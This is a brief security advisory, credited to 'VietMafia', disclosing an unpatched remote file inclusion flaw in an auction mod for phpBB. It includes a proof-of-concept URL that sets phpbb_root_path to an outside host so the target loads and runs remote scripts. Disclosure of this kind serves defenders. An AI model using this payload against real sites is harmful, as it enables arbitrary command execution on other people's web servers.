phpBB auction mod - Remote File Inclusion Vuln

===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================

Vuln. Description:

This flaw is due to an input validation error in the "aution\auction_common.php"(line 26)
that does not validate the "$phpbb_root_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

===================================
have a good time all my friends
===================================